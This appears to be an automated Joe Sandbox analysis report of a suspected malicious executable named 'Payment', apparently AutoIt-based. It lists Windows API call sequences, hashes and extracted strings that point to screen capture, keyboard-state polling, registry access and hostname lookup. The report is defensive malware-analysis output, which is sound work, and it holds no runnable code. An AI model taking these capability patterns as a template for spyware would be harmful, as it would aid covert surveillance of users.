                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: e9dc053605bd0c9268844f4adf4801ad880391526c5c4d280d169ddf3dc082cb
                                                          • Instruction ID: 28323bc016d73637269328cd419806286a80a6ffb7d59f97ce0b5c5d6a5ce365
                                                          • Opcode Fuzzy Hash: e9dc053605bd0c9268844f4adf4801ad880391526c5c4d280d169ddf3dc082cb
                                                          • Instruction Fuzzy Hash: 2461507190121AAFDF01DF94EC45AEEBBB9FF04311F0882A9F919A7291DB359A05CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00B476A2
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B476AE
                                                          • CreateCompatibleDC.GDI32(?), ref: 00B476BA
                                                          • SelectObject.GDI32(00000000,?), ref: 00B476C7
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B4771B
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B47757
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B4777B
                                                          • SelectObject.GDI32(00000006,?), ref: 00B47783
                                                          • DeleteObject.GDI32(?), ref: 00B4778C
                                                          • DeleteDC.GDI32(00000006), ref: 00B47793
                                                          • ReleaseDC.USER32(00000000,?), ref: 00B4779E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 2a95463e891067254fbec8c2c975224958046ea460e94dc9c5a225059342c02f
                                                          • Instruction ID: 9fc1cedb482f81e2430c3453482679ec4b0bcba944b21e1da97da1cf690dd821
                                                          • Opcode Fuzzy Hash: 2a95463e891067254fbec8c2c975224958046ea460e94dc9c5a225059342c02f
                                                          • Instruction Fuzzy Hash: 1D513675904309EFCB15CFA8CC85EAEBBF9EF48710F148569F94AA7250DB31A940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,00B5FB78), ref: 00B3A0FC
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B3A11E
                                                          • __swprintf.LIBCMT ref: 00B3A177
                                                          • __swprintf.LIBCMT ref: 00B3A190
                                                          • _wprintf.LIBCMT ref: 00B3A246
                                                          • _wprintf.LIBCMT ref: 00B3A264
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-2391861430
                                                          • Opcode ID: ec075918d3e44b752e34e51de5ee10c704d89b585892e825559c0105ee7b3f19
                                                          • Instruction ID: 40c4d8c3835a546c4f813de7fc5290f8c50e35198206f9aefb872ac339867548
                                                          • Opcode Fuzzy Hash: ec075918d3e44b752e34e51de5ee10c704d89b585892e825559c0105ee7b3f19
                                                          • Instruction Fuzzy Hash: 52515571900519AACF15EBE0CE86EEEB7B9EF04300F2401A6F516731A1EB316F58DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AD6C6C,?,00008000), ref: 00AF0BB7
                                                            • Part of subcall function 00AD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AD48A1,?,?,00AD37C0,?), ref: 00AD48CE
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AD6D0D
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD6E5A
                                                            • Part of subcall function 00AD59CD: _wcscpy.LIBCMT ref: 00AD5A05
                                                            • Part of subcall function 00AF387D: _iswctype.LIBCMT ref: 00AF3885
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
                                                          • Opcode ID: b57ec6ba48c21d5e329b8860771a6feb2108f9bee607cc0e2af6ed26a15f50c9
                                                          • Instruction ID: 02b048dc72ff8e339701bc7b2e4d2c1bf07c88a579455d2f91f59526ce4a2e8e
                                                          • Opcode Fuzzy Hash: b57ec6ba48c21d5e329b8860771a6feb2108f9bee607cc0e2af6ed26a15f50c9
                                                          • Instruction Fuzzy Hash: 2302AA315083419FC724EF24C991AAFBBE5EF88354F14496EF49A972A1DB30E949CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00AD45F9
                                                          • GetMenuItemCount.USER32(00B96890), ref: 00B0D7CD
                                                          • GetMenuItemCount.USER32(00B96890), ref: 00B0D87D
                                                          • GetCursorPos.USER32(?), ref: 00B0D8C1
                                                          • SetForegroundWindow.USER32(00000000), ref: 00B0D8CA
                                                          • TrackPopupMenuEx.USER32(00B96890,00000000,?,00000000,00000000,00000000), ref: 00B0D8DD
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B0D8E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: 0d15914264c1089612cd0586faab0968f36cba7e14b635995ece361a27cc15cb
                                                          • Instruction ID: 8601c0af3cb5487ee7ac4cccea2b0d6e8a89b6e39f322be68aaacbbb8820b52d
                                                          • Opcode Fuzzy Hash: 0d15914264c1089612cd0586faab0968f36cba7e14b635995ece361a27cc15cb
                                                          • Instruction Fuzzy Hash: 9171E470640206BBEB219F54DC89FAAFFA4FF05364F204256F516A61E1DBB1AC10DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B50038,?,?), ref: 00B510BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: ec12aea9a55d86ffc03b8478d8288af340701858a0bf709b72256f2db3a9d51f
                                                          • Instruction ID: 453b961b6dbd0e22f485e6e79e285825649d185127fa1ef98ebed8a5a28c7e9d
                                                          • Opcode Fuzzy Hash: ec12aea9a55d86ffc03b8478d8288af340701858a0bf709b72256f2db3a9d51f
                                                          • Instruction Fuzzy Hash: 47412B3115024E8BCF20EFA4D995FEA37A4EF16341F5048D5FD916B2A2DB31A91ACB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                            • Part of subcall function 00AD7A84: _memmove.LIBCMT ref: 00AD7B0D
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B355D2
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B355E8
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B355F9
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B3560B
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B3561C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 7a372d826d6e95e6c9775cb12604d62e3efba29d0d04c6e0eae93e3dbe050fcc
                                                          • Instruction ID: b1f8e3d9f8980b92f91d8d472226ce7f9e16dbcb5274b3ff9224cef159aaf3d4
                                                          • Opcode Fuzzy Hash: 7a372d826d6e95e6c9775cb12604d62e3efba29d0d04c6e0eae93e3dbe050fcc
                                                          • Instruction Fuzzy Hash: BA11942095016979E724B661CC8ADFFBBBCFF95B40F5004ABB402A21F1EE601E05CAA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 6241e318797fa5a6eaf46552162e4cdf1ed1b1f20ea59ea4d783144c8a16bd93
                                                          • Instruction ID: 674827ebcd2b7d948530bfa1b6682de2241aed973b80f1787d8aad67784d9088
                                                          • Opcode Fuzzy Hash: 6241e318797fa5a6eaf46552162e4cdf1ed1b1f20ea59ea4d783144c8a16bd93
                                                          • Instruction Fuzzy Hash: 5011C331904219AFCB20AB64AD4AFEB77ECDB04721F1402F6F504960A1EF71AE818751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • timeGetTime.WINMM ref: 00B3521C
                                                            • Part of subcall function 00AF0719: timeGetTime.WINMM(?,75A8B400,00AE0FF9), ref: 00AF071D
                                                          • Sleep.KERNEL32(0000000A), ref: 00B35248
                                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B3526C
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B3528E
                                                          • SetActiveWindow.USER32 ref: 00B352AD
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B352BB
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B352DA
                                                          • Sleep.KERNEL32(000000FA), ref: 00B352E5
                                                          • IsWindow.USER32 ref: 00B352F1
                                                          • EndDialog.USER32(00000000), ref: 00B35302
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 7022274b00a9f628038e7a52dbc0872ae5b1b158409639024cc14e00b73994a7
                                                          • Instruction ID: 66f013523f183eaae2ae8e8f4dce3ec3fb8776fb35dd35ff889289c1baedca14
                                                          • Opcode Fuzzy Hash: 7022274b00a9f628038e7a52dbc0872ae5b1b158409639024cc14e00b73994a7
                                                          • Instruction Fuzzy Hash: D9218070154705AFE7105B70EE88B36BBE9EB66347F2104A9F50293171DE719C04C721
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • CoInitialize.OLE32(00000000), ref: 00B3D855
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B3D8E8
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00B3D8FC
                                                          • CoCreateInstance.OLE32(00B62D7C,00000000,00000001,00B8A89C,?), ref: 00B3D948
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B3D9B7
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00B3DA0F
                                                          • _memset.LIBCMT ref: 00B3DA4C
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00B3DA88
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B3DAAB
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00B3DAB2
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B3DAE9
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00B3DAEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 4f9d57def88d9e4a8db593855aaa97bd66a0743de27bf4e9b0b771c7a38903d4
                                                          • Instruction ID: 42705236d1f6df2df7f0bf250a3868468eb8d0084c70347e3f25be4bfe47e55d
                                                          • Opcode Fuzzy Hash: 4f9d57def88d9e4a8db593855aaa97bd66a0743de27bf4e9b0b771c7a38903d4
                                                          • Instruction Fuzzy Hash: 9BB1DC75A00209AFDB04DFA4D984EAEBBF9EF48304F1484A9F506EB261DB30ED45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00B305A7
                                                          • SetKeyboardState.USER32(?), ref: 00B30612
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B30632
                                                          • GetKeyState.USER32(000000A0), ref: 00B30649
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B30678
                                                          • GetKeyState.USER32(000000A1), ref: 00B30689
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B306B5
                                                          • GetKeyState.USER32(00000011), ref: 00B306C3
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B306EC
                                                          • GetKeyState.USER32(00000012), ref: 00B306FA
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B30723
                                                          • GetKeyState.USER32(0000005B), ref: 00B30731
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 2260e161d8cfa18e3ca0bf095317667f5d3575344f7347e0d33f6ec2fb217781
                                                          • Instruction ID: 6ef3e9dbcf194f06af2f02c50f4a36fae2bcfff53c2e12b8b8858632b2e9824e
                                                          • Opcode Fuzzy Hash: 2260e161d8cfa18e3ca0bf095317667f5d3575344f7347e0d33f6ec2fb217781
                                                          • Instruction Fuzzy Hash: 22512A20A1478829FB34FBB488617EABFF4DF11380F2845D9C5C2571C2DA64AB4CCB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 00B2C746
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B2C758
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B2C7B6
                                                          • GetDlgItem.USER32(?,00000002), ref: 00B2C7C1
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B2C7D3
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B2C827
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B2C835
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B2C846
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B2C889
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B2C897
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B2C8B4
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B2C8C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 7782b9f4626d3926e15ac0653be9cc48a2958e76ad5c4246dc39e195fdad6396
                                                          • Instruction ID: 4c0ec54825ef4e8b7dd3d9470ac4748da713fedf98f178eaaa46cb45064c8116
                                                          • Opcode Fuzzy Hash: 7782b9f4626d3926e15ac0653be9cc48a2958e76ad5c4246dc39e195fdad6396
                                                          • Instruction Fuzzy Hash: 00512F71B00205ABDB18CF69DD99BBEBBBAEB88311F14816DF519D72A0DB709D00CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AD2036,?,00000000,?,?,?,?,00AD16CB,00000000,?), ref: 00AD1B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AD20D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,00AD16CB,00000000,?,?,00AD1AE2,?,?), ref: 00AD216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B0BEF6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AD16CB,00000000,?,?,00AD1AE2,?,?), ref: 00B0BF27
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AD16CB,00000000,?,?,00AD1AE2,?,?), ref: 00B0BF3E
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AD16CB,00000000,?,?,00AD1AE2,?,?), ref: 00B0BF5A
                                                          • DeleteObject.GDI32(00000000), ref: 00B0BF6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: cf080fa1b551fb44ad0d8cd4b4d0c8281f0a8c4c1ba6660bb21f5306085c64df
                                                          • Instruction ID: aec18b3c91a5d8119ae50406f797ffefef57c476be745b866f0bceea26315df5
                                                          • Opcode Fuzzy Hash: cf080fa1b551fb44ad0d8cd4b4d0c8281f0a8c4c1ba6660bb21f5306085c64df
                                                          • Instruction Fuzzy Hash: 05615931500612DFCB25AF14DE88B2ABBF1FB64316F1485ABE54397AA0CB75AC81DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AD25EC
                                                          • GetSysColor.USER32(0000000F), ref: 00AD21D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: d324767452fce9cec25b4ec971e887d952eb0dc4034bb4287bfbe88c56f07a80
                                                          • Instruction ID: 0cc7b3dcf6a22983be38d040706d99ff5bfb57938eae74dc7ebe39f375d926ab
                                                          • Opcode Fuzzy Hash: d324767452fce9cec25b4ec971e887d952eb0dc4034bb4287bfbe88c56f07a80
                                                          • Instruction Fuzzy Hash: 9341A4310046409FDB215F28EC88BF97BA5EB16331F1443A6FD669B2E6CB318C42DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
